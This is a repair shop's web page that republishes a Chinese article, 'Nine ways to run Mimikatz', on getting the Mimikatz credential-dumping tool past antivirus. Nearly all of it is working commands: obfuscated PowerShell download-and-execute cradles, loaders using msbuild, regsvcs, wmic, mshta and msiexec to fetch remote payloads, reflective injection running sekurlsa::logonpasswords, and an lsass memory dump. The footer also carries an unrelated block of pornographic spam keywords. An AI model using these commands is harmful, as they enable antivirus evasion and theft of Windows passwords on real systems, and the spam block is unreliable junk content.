錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
九種姿勢運行Mimikatz

作者: 佚名  日期:2018-07-14 13:03:46   來源: 本站整理

 前言
平時收集的一些姿勢,用戶繞過殺軟執行mimikatz,這里以360為例進行bypass 測試。
下載最新版360:

未經處理的mimikatz直接就被殺了

下面開始進行繞過360抓密碼
姿勢一-powershell
https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1
cmd下執行
C:\Users\test\Desktop>powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"
也可以遠程加載
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-Mimikatz.ps1');Invoke-Mimikatz
但是powershell被360攔截

簡單混淆就bypass了
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
動圖:/article/UploadPic/2018-7/201871316575152.gif
姿勢二-用.net2.0加載mimikatz
作者Casey Smith, Twitter: @subTee
下載
https://gist.githubusercontent.com/nicholasmckinney/896b508b6cf1e8c3e567ccab29c8d3ec/raw/afa7219adbfcdfc160c163273ef8ec61ff0658b4/katz.cs
將katz.cs放置C:\Windows\Microsoft.NET\Framework\v2.0.50727
先powoershell執行
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Contentkey.snk -Value $Content -EncodingByte
再cmd執行
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
動圖:/article/UploadPic/2018-7/201871316579593.gif
姿勢三-JS加載mimikatz
用DotNetToJScript實現
https://github.com/tyranid/DotNetToJScript
mimikatz
https://gist.github.com/500646/14051b27b45dce37818aca915e93062f/raw/2adcc9d2570b4367c6cc405e5a5969863d04fc9b/katz.js
執行cscript mimikatz.js 

但是這個方法已經會被一些殺軟標記成惡意軟件,繞過方法參考
https://evi1cg.me/archives/AMSI_bypass.html
姿勢四-msiexec加載mimikatz
作者 homjxi0e
下載
https://github.com/homjxi0e/PowerScript/blob/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi
遠程執行
PS:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestartcmd:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestart
本地執行
msiexec /passive /i C:\Users\Administrator\Downloads\Mimikatz.msi
姿勢五-.net4.0加載mimikatz
作者 subTee
下載mimikatz.xml
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20mimikatz.xml
執行
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exemimikatz.xml

姿勢六-JScript的xsl版
作者 subTee
下載
https:/gist.github.com/manasmbellani/7f3e39170f5bc8e3a493c62b80e69427/raw/87550d0fc03023bab99ad83ced657b9ef272a3b2/mimikatz.xsl
本地加載
wmic os get /format:"mimikatz.xsl"
遠程加載
wmic os get /format:"http://127.0.0.1/mimikatz.xsl"
姿勢七-jscript的sct版
作者 subTee
下載
https:/gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct
執行
mshta.exe javascript:a=GetObject("script:https://gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct").Exec(); log coffee exit

姿勢八-內存中加載mimikatz
下載
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
執行
powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.101/mimikatz.exe -ExeArgs "sekurlsa::logonpasswords" -ForceASLR
動圖:/article/UploadPic/2018-7/2018713165715106.gif
姿勢九-導出lsass進程離線讀密碼
下載procdump64.exe
執行
procdump64.exe-accepteula-malsass.exe 1.dmp
也可以在任務管理器中操作

然后將1.dmp下載到本地
mimikatz_2.1_64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

總結
1.對比這幾種方式個人還是喜歡導出lsass進程內存方式來讀取密碼。
2.也可以用powershell遠程加載mimikatz腳本讀密碼,簡單方便。
 




熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 精品久久久久久无码人妻中文字幕 | 国产在线无码精品无码| 一区二区无码免费视频网站| 久久亚洲精品成人无码| 国产亚洲精品无码成人| 蜜桃成人无码区免费视频网站 | 成人无码WWW免费视频| 中文AV人妻AV无码中文视频| 国产精品无码专区在线播放| 无码人妻丰满熟妇区免费| 在线观看无码的免费网站| 精品亚洲A∨无码一区二区三区| 国产免费久久久久久无码| 中文字幕无码不卡免费视频 | 无码人妻黑人中文字幕| 精品无码国产自产拍在线观看蜜 | 人妻丰满熟妇AV无码区免| 无码精品久久久久久人妻中字| 亚洲成a人无码av波多野按摩| 最新亚洲春色Av无码专区| 无码人妻精品一区二区三区66 | a级毛片无码免费真人久久 | 精品久久久久久中文字幕无码| 久久国产精品无码HDAV| 亚洲av永久无码精品天堂久久 | 日韩精品人妻系列无码专区 | 欧洲人妻丰满av无码久久不卡| 狠狠躁狠狠爱免费视频无码 | 亚洲av永久无码精品秋霞电影秋 | 久久久久成人精品无码| 国产精品爽爽V在线观看无码| 人妻丰满熟妇AV无码区| 国产精品无码久久四虎| 大胆日本无码裸体日本动漫| 亚洲AV无码成人精品区日韩| 亚洲天然素人无码专区| 色综合99久久久无码国产精品| 人妻少妇精品无码专区二区| 亚洲AV色吊丝无码| 亚洲成在人线在线播放无码 | 成人免费无码精品国产电影|